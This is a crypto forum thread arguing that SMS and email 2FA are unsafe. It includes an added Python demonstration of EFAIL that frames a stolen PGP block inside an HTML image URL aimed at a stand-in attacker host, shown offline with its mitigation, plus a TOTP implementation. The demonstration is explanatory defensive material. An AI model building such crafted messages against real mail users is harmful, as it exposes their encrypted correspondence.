
Topic: For All Of You That Still Think SMS For 2FA For Wallets Is Or Was Safe. - page 2. (Read 366 times)

legendary
Activity: 2828
Merit: 6108
Jambler.io
2FA should be mandatory on all your online accounts which hold anything sensitive or valuable, especially any accounts holding bitcoin. But that 2FA should never be either SMS or email based. As we've seen, SMS messages are sent unencrypted through an unknown number of intermediaries before they reach you, can be intercepted at any point along the way, and your phone number can easily be transferred to an attacker with a SIM swap attack.

Intercepting is one thing; matching it with the account in question is a different thing altogether for a service that receives hundreds of logins per minute and routes them through different providers, like the large exchanges or banks. You are simply looking at lists and lists of codes; you also need to know the phone number of the victim, the password, the login. Of course, SMS 2FA is not really the best choice, but it's way better than nothing, and let's be clear: at this point there is only speculation that hackers had access to the content of the messages, one random source that said the hackers could have gained access, not that they did.

Others have taken this to another level: my bank asks for a security PIN every time I change the IP from which I log in, even for the app. That one can't be changed and the option can't be removed unless you go to a physical bank and submit a request, unlike the 6-digit 2FA that is used only to validate transactions.
hero member
Activity: 882
Merit: 5818
not your keys, not your coins!
Oh, well, SMS based 2FA should not be used anyway. I was under the assumption that it's insecure and not to be used for years.
If you use something like FIDO U2F your chances are better.
However, no system is 100% secure, and almost everything will probably be hacked sooner or later. Even with a perfectly secure cryptosystem, you'll have flaws in the implementation for example.
I don't see how 2FA is used in a wallet though. Would this be for online wallets? Because those shouldn't be used in the first place either.

Exchanges use 2FA all the time. Some use Google or similar; many use SMS.
And even if you live by the "don't leave your coins on an exchange" idea, if you do want to move fiat in and out or do trading, you are going to use one sooner or later.
Ahh right, so with 2FA for wallets, you mean 2FA for exchanges. I didn't know they still allow using SMS for 2FA. That's really bad, and it should not be changed today; it should actually have been changed years ago!

On top of that, no matter how you look at it, it's really surprising that a hack of this magnitude went on for so long and nobody is really talking about it.
I agree; most people are more worried about Facebook being down for a few hours than about their 2FA setups.
legendary
Activity: 3458
Merit: 6231
Crypto Swap Exchange
Oh, well, SMS based 2FA should not be used anyway. I was under the assumption that it's insecure and not to be used for years.
If you use something like FIDO U2F your chances are better.
However, no system is 100% secure, and almost everything will probably be hacked sooner or later. Even with a perfectly secure cryptosystem, you'll have flaws in the implementation for example.
I don't see how 2FA is used in a wallet though. Would this be for online wallets? Because those shouldn't be used in the first place either.

Exchanges use 2FA all the time. Some use Google or similar; many use SMS.
And even if you live by the "don't leave your coins on an exchange" idea, if you do want to move fiat in and out or do trading, you are going to use one sooner or later.

On top of that, no matter how you look at it, it's really surprising that a hack of this magnitude went on for so long and nobody is really talking about it.

-Dave
legendary
Activity: 2730
Merit: 7065
Farewell, Leo. You will be missed!
I have also read back in 2018 that there was something wrong with PGP and it was crackable. Can't claim the actual title, to be fair, but I remember that the article was stating that PGP isn't a safe option.
I guess you read something about the EFAIL vulnerability, as it's explained in this article.

According to the article, it is possible to decrypt a PGP-encrypted email if it gets intercepted or stolen from a computer or a server. But to do that, a custom HTML modification would need to be inserted into the encrypted email before it gets sent back to the attacker. If performed successfully, this tricks the email software into sending an unencrypted version of the encrypted email back to the attackers. The problem lies in the email clients, and not directly in PGP. The article mentions Outlook and Thunderbird as two email clients vulnerable to this type of attack. At least they were back in 2018.

The article suggests a mitigation technique: disable HTML rendering in your email software.
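The post above describes the "direct exfiltration" variant of EFAIL in prose; the following is an added example, not code from the thread or from the EFAIL authors, that shows the MIME framing behind it and the mitigation named in the post. No cryptography is touched: decrypt_part() is a stand-in for the client's PGP hook, the ciphertext block is a constructed placeholder rather than real armor, and the addresses and collection URL are assumed. What the example shows is that an HTML part which opens an `<img src="` attribute, followed by the stolen encrypted part, followed by an HTML part that closes the attribute, becomes one HTML document in a client that decrypts each part and concatenates them, so the plaintext ends up inside a URL the client would fetch.

```python
import email
import email.policy
import html
import re
from email.message import EmailMessage

# Constructed sample data: the "stolen" ciphertext is a placeholder block, not
# real PGP armor, and decrypt_part() below is a stand-in for the client's
# decryption hook so that the example runs offline.
PLAINTEXT = "Meeting password is hunter2"
STOLEN_CIPHERTEXT = (
    "-----BEGIN PGP MESSAGE-----\n"
    "cGxhY2Vob2xkZXIgY2lwaGVydGV4dA==\n"
    "-----END PGP MESSAGE-----\n"
)
ATTACKER_URL = "https://attacker.example.invalid/log?"  # assumed collection endpoint


def decrypt_part(body):
    """Stand-in for the mail client's PGP decryption of one MIME part."""
    return PLAINTEXT if "BEGIN PGP MESSAGE" in body else body


def build_efail_message(stolen_ciphertext):
    """Attacker's crafted mail: an HTML part that opens an <img src=" attribute
    and never closes it, then the stolen encrypted part, then an HTML part that
    closes the attribute.  Only MIME framing is involved."""
    msg = EmailMessage()
    msg["From"] = "attacker@example.invalid"  # assumed addresses
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Re: your message"
    msg.make_mixed()
    prefix = EmailMessage()
    prefix.set_content('<img src="' + ATTACKER_URL, subtype="html")
    encrypted = EmailMessage()
    encrypted.set_content(stolen_ciphertext)  # text/plain: the pasted PGP block
    suffix = EmailMessage()
    suffix.set_content('">', subtype="html")
    for part in (prefix, encrypted, suffix):
        msg.attach(part)
    return bytes(msg)


def vulnerable_render(raw):
    """The flawed behaviour: decrypt each part, then glue everything into one
    HTML document.  The plaintext lands inside the attacker's image URL, and
    an HTML-rendering client would request that URL when displaying the mail."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    return "".join(decrypt_part(part.get_content()) for part in msg.iter_parts())


def exfiltrated_url(rendered_html):
    """What a rendering client would fetch for the first <img> tag, if any."""
    match = re.search(r'<img src="([^"]*)"', rendered_html)
    return match.group(1) if match else None


def hardened_render(raw):
    """The mitigation the post names: HTML is not rendered (markup is shown as
    text) and each part is kept separate instead of being concatenated."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    return [html.escape(decrypt_part(part.get_content())) for part in msg.iter_parts()]


if __name__ == "__main__":
    raw = build_efail_message(STOLEN_CIPHERTEXT)
    print("vulnerable client would fetch:", repr(exfiltrated_url(vulnerable_render(raw))))
    print("hardened client shows parts:", hardened_render(raw))
```

The decrypted text is still readable in the hardened output (it is decrypted locally in both cases); the difference is only that the attacker's markup is displayed instead of interpreted, so no request carrying the plaintext leaves the machine.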
hero member
Activity: 882
Merit: 5818
not your keys, not your coins!
Oh, well, SMS based 2FA should not be used anyway. I was under the assumption that it's insecure and not to be used for years.
If you use something like FIDO U2F your chances are better.
However, no system is 100% secure, and almost everything will probably be hacked sooner or later. Even with a perfectly secure cryptosystem, you'll have flaws in the implementation for example.
I don't see how 2FA is used in a wallet though. Would this be for online wallets? Because those shouldn't be used in the first place either.
legendary
Activity: 2268
Merit: 18509
It's not 100% safe and that has been proven but that doesn't mean that it's not better than nothing.
It actually might mean it's not better than nothing. In the case of the recent Coinbase hack, due to a vulnerability in their SMS system, attackers who could intercept users' SMS messages (which we know is very easy to do) were able to gain access to their Coinbase accounts and steal all their coins.

2FA is better than nothing, if someone hacks our account
2FA should be mandatory on all your online accounts which hold anything sensitive or valuable, especially any accounts holding bitcoin. But that 2FA should never be either SMS or email based. As we've seen, SMS messages are sent unencrypted through an unknown number of intermediaries before they reach you, can be intercepted at any point along the way, and your phone number can easily be transferred to an attacker with a SIM swap attack. Email also isn't secure, as if someone compromises your email account then they can both reset your exchange account password and receive any 2FA email, meaning both your factors have the same single point of failure. 2FA should be at a minimum a 2FA app, preferably on a phone you never use to access the accounts in question (since again, if an attacker unlocks your phone, they can log in to your account through the saved credentials and access the relevant 2FA code, meaning both your factors have the same single point of failure). The best option is to use a hardware key such as a YubiKey. Some hardware wallets also offer this function.
legendary
Activity: 3430
Merit: 10505
Can't claim the actual title, to be fair, but I remember that the article was stating that PGP isn't a safe option.
Interesting, but in my experience these insecurities are almost always related to the implementation of the algorithm, not the algorithm itself. Otherwise the underlying cryptography is secure: it uses RSA and ECC, and the latter is basically what we are using in bitcoin too and is secure when used correctly (choose a secure EC curve, a strong hash algorithm, etc.).
HCP
legendary
Activity: 2086
Merit: 4314
SIM swapping has been an issue forever.

It still bothers me that there are services that insist on using either email or SMS as part of a 2FA system, as they're so easily exploitable. I really wish more services would use TOTP as standard. While not perfect, it is much better than email or SMS.
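As an added example, not code from the thread or from any of the services discussed: the TOTP scheme HCP wishes were standard, implemented from RFC 4226 (HOTP) and RFC 6238 (TOTP) with nothing but the Python standard library. The point it makes concrete is that the code is HMAC(secret, floor(time / 30)) computed on the device that holds the secret, so there is no carrier, SMS gateway or mailbox in the path an attacker could intercept or SIM-swap; the only shared state is the seed exchanged once at enrolment. The seed used is the RFC 6238 Appendix B test seed, the Base32 handling mirrors how authenticator apps receive the secret in an otpauth URI, and the one-step acceptance window is an assumption of this example, not a value from the page.

```python
import base64
import hashlib
import hmac
import struct
import time

# RFC 6238 Appendix B reference seed (ASCII "12345678901234567890"), used here
# only so the output can be checked against the published test vectors.
RFC_SECRET = b"12345678901234567890"


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """RFC 4226: HMAC(secret, counter) -> dynamic truncation -> `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F                      # low nibble of the last byte
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, at=None, step=30, digits=6, algo=hashlib.sha1):
    """RFC 6238: HOTP with the counter set to the current 30-second time step."""
    now = time.time() if at is None else at
    return hotp(secret, int(now // step), digits, algo)


def verify_totp(secret, candidate, at=None, step=30, digits=6, window=1):
    """Server-side check. Accepts the current step and +/- `window` neighbouring
    steps to tolerate clock drift (window=1 is an assumed, typical value);
    compare_digest keeps the comparison constant-time. A real verifier would
    also record the last accepted step so a captured code cannot be replayed."""
    now = time.time() if at is None else at
    counter = int(now // step)
    for c in range(counter - window, counter + window + 1):
        if hmac.compare_digest(hotp(secret, c, digits), candidate):
            return True
    return False


def secret_from_base32(encoded):
    """Authenticator apps receive the seed as Base32 in an otpauth:// URI;
    padding and spaces are often omitted, so restore them before decoding."""
    compact = encoded.strip().replace(" ", "").upper()
    compact += "=" * (-len(compact) % 8)
    return base64.b32decode(compact)


if __name__ == "__main__":
    # Expected from RFC 6238 Appendix B: 94287082 at T=59 with 8 digits.
    print("T=59, 8 digits:", totp(RFC_SECRET, at=59, digits=8))
    print("code right now:", totp(RFC_SECRET))
```

Anything that reproduces these values has to hold the seed and a clock; an attacker who only sees the transport sees nothing, because there is no transport. That is the property SMS cannot offer, since the carrier necessarily handles the code in the clear.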
legendary
Activity: 1134
Merit: 1597
Let's not even mention those "hacks" done with the actual help of carriers by replacing the real owner's SIM card with a perpetrator's new one as well. SIMs are never safe. I think that anything going through a centralized method is going to have a flaw found sooner or later. Just the fact that those carriers know your 2FA before actually sending it to you is scary enough. Use offline as much as possible for security, and by offline I mean anything that sits only in your local storage and never communicates with external servers/satellites/whatever.
hero member
Activity: 2198
Merit: 847
It's not 100% safe and that has been proven, but that doesn't mean that it's not better than nothing. I have also read back in 2018 that there was something wrong with PGP and it was crackable. Can't claim the actual title, to be fair, but I remember that the article was stating that PGP isn't a safe option.
We live in the era of IT and we are still new to it; it's full of surprises and always will be!

That's not the end! Can you remember how secure houses were decades ago? And can you recall how secure they are right now? There is a huge difference, right? In the past you could burn any house; right now elite houses have superior protection. Again, it's not the end! Very sad, but what's done is done. 2FA is better than nothing; if someone hacks our account, I hugely, hugely doubt that it will be a person who had access to that company's database.
sr. member
Activity: 280
Merit: 252
Signal for messages. Doesn't protect your wallet, though. This is proof that 2FA is just annoying.
legendary
Activity: 3458
Merit: 6231
Crypto Swap Exchange
It never was. And no matter how much you want to think otherwise YOU were probably part of this breach.
That's correct, billions of messages over 5 years.

https://www.vice.com/en/article/z3xpm8/company-that-routes-billions-of-text-messages-quietly-says-it-was-hacked

Quote
The company wrote that it discovered the breach in May 2021, but that the hack began in May of 2016.

Go ahead, send nudes to your partner. I'll just download them and look at them later. I am busy taking some money out of your accounts at the moment.

-Dave